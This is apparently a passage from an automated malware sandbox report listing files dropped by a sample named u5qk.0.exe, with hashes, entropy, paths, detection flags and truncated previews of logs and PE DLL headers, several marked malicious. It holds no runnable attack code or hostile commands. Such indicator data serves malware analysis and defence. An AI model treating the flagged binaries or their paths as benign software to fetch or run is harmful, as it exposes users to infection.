                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6304
                                                                                                                                                                                                                                    Entropy (8bit):3.715310945053825
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbU5868YOlbZCxggaMQU089bQRsfKYlGm:R6l7wVeJA868Y8GpD089bQRsfXwm
                                                                                                                                                                                                                                    MD5:2CA3D36EFFF67812E3A1D66F5C0DB13C
                                                                                                                                                                                                                                    SHA1:F3D759BFEAC94E8C976F12CF837CF7D2E312E865
                                                                                                                                                                                                                                    SHA-256:59B4088AEBB4C27FD154BF5F98CDA2525BCCFC46E02B3C94E529E8877C7C04BF
                                                                                                                                                                                                                                    SHA-512:3CE0799C79633F54CCAF3FF962BD8660EE88A788241A39AA0930485C63EE660649431775B4C987B8E6CA706AA9BAB4918852DDA25B2068F01309F56EC42A65BC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.6.<./.P.i.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4551
                                                                                                                                                                                                                                    Entropy (8bit):4.433645455298645
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsFJg77aI974WpW8VYgYm8M4JFmUoFgJ+q8SVT/3/4RAd:uIjffI79x7V0JTv3/4RAd
                                                                                                                                                                                                                                    MD5:C10C920335CEBA9C65300DC3817B7B18
                                                                                                                                                                                                                                    SHA1:AF33E321438E5E6E7EB00B096B30E2E2B301360E
                                                                                                                                                                                                                                    SHA-256:83280C71134B52E6C5C0519C47BFEB42DAD8D58478CBCEC036869809AB857870
                                                                                                                                                                                                                                    SHA-512:206928713771FA5A8FE3B4FC0F87710BFF9DE7752858838809C0BAC23659B6EDA6F10575C269EC6418E46AF1BDA5A203D6D0C1EEDA3B0C0920D45E47ED1C70A5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297515" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                    MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                    SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                    SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                    SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.699088014379539
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                                                                                                                                                                    MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                                                                                                                                                                    SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                                                                                                                                                                    SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                                                                                                                                                                    SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.699088014379539
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                                                                                                                                                                    MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                                                                                                                                                                    SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                                                                                                                                                                    SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                                                                                                                                                                    SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                    MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                    SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                    SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                    SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: kO1P1YnLst.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: wxfSIz4PAi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                    Entropy (8bit):5.199488876047769
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:BMKL6TKstaAgrCYbTKRmLIYvgBtXSDTKyHB1JCsTYTOI0XY4eA:fiKiaXCY3KRmkYvgLXSPKQ/tY673
                                                                                                                                                                                                                                    MD5:A92D8138354184EBBC34FD98FE9D14CF
                                                                                                                                                                                                                                    SHA1:2D217A8F53BC3197892D8A0C7F46EE9723994F0C
                                                                                                                                                                                                                                    SHA-256:F39DF8F78416DE230240E44BD8BF9A79D8B47853D66B1045600FD220A04C9DD0
                                                                                                                                                                                                                                    SHA-512:FA8DC3AB454E626E630CC2F4012AB9BD3F439CBB85488E4549BA89C53CBE4C15B13E7B9BFA409D1C96EB41B12983A144470D2EC92F3F5FF95DD40C253D5468A9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Bootstrap LogFile..-----------------..[27/04/2024 01:32:31]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[27/04/2024 01:32:31]: This Brand IOLODEFAULT Not Detected As Installed..[27/04/2024 01:32:31]: No Supported Products Were Detected On This System..[27/04/2024 01:33:26]: Telemetry Data Sent..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.3.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                    Entropy (8bit):5.220934387524738
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:quS0TCfk3VotGjZb34LuP0QiloieQs0TCfk3VotGjZb34LuhE/Qiloe:r9TXVotgOLuPZiBLHTXVotgOLutit
                                                                                                                                                                                                                                    MD5:B0E51F5CA41A264F37D6E2BA4B106BB1
                                                                                                                                                                                                                                    SHA1:01FAA81DAFB2B270D7F8DB99AF15DE4BC719651C
                                                                                                                                                                                                                                    SHA-256:08751C7938DFA13B7306784A2B8CFCB52F119E4CED7F82DA0ED3DB1784DAAF36
                                                                                                                                                                                                                                    SHA-512:74D266C4770D1CF24BB4A4B790C004FF7AE419B387F420E4026CECA3D35101DF688E88425BC2B7506F2992B3C2D6A52FC2816BDB07889B4CEE3B4C78910241CD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[04/27/24 01:32:00] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 01:32:01] IsValidCommunication : Result := True...[04/27/24 01:32:15] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 01:32:16] IsValidCommunication : Result := True...
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: kO1P1YnLst.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: wxfSIz4PAi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
